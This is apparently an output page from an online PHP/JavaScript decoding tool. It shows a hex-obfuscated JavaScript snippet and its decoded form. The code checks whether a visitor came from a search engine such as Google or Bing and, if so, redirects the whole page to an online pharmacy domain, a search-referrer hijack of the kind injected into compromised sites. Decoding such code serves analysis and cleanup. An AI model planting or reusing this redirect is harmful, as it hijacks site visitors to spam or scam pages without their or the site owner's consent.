Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

var _$ = ["\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x74\x68\x65\x6b\x65\x6..

Decoded Output download

<?  var _$ = ["http://www.apothekedeutsch.com",  
"google,bing,yahoo,aol,babylon",  
"document", "referrer", "split", ",",  
"length", "indexOf", "location", "href"]; 
var a = _$[0]; 
var b = _$[1]; 
var c = window[_$[2]][_$[3]]; 
if (c) 
{ 
    var d = b[_$[4]](_$[5]); 
    for (i = 0x0; i < d[_$[6]]; i++) { 
        if (c[_$[7]](d[i]) > 0x0) { 
            top[_$[8]][_$[9]] = a; 
        } 
    } 
} ?>

Did this file decode correctly?

Original Code

var _$ = ["\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x74\x68\x65\x6b\x65\x64\x65\x75\x74\x73\x63\x68\x2e\x63\x6f\x6d", 
"\x67\x6f\x6f\x67\x6c\x65\x2c\x62\x69\x6e\x67\x2c\x79\x61\x68\x6f\x6f\x2c\x61\x6f\x6c\x2c\x62\x61\x62\x79\x6c\x6f\x6e", 
"\x64\x6f\x63\x75\x6d\x65\x6e\x74", "\x72\x65\x66\x65\x72\x72\x65\x72", "\x73\x70\x6c\x69\x74", "\x2c", 
"\x6c\x65\x6e\x67\x74\x68", "\x69\x6e\x64\x65\x78\x4f\x66", "\x6c\x6f\x63\x61\x74\x69\x6f\x6e", "\x68\x72\x65\x66"];
var a = _$[0];
var b = _$[1];
var c = window[_$[2]][_$[3]];
if (c)
{
    var d = b[_$[4]](_$[5]);
    for (i = 0x0; i < d[_$[6]]; i++) {
        if (c[_$[7]](d[i]) > 0x0) {
            top[_$[8]][_$[9]] = a;
        }
    }
}

Function Calls

None

Variables

None

Stats

MD5 6ecf898ef6eee3a5084ca4d15878d832
Eval Count 0
Decode Time 75 ms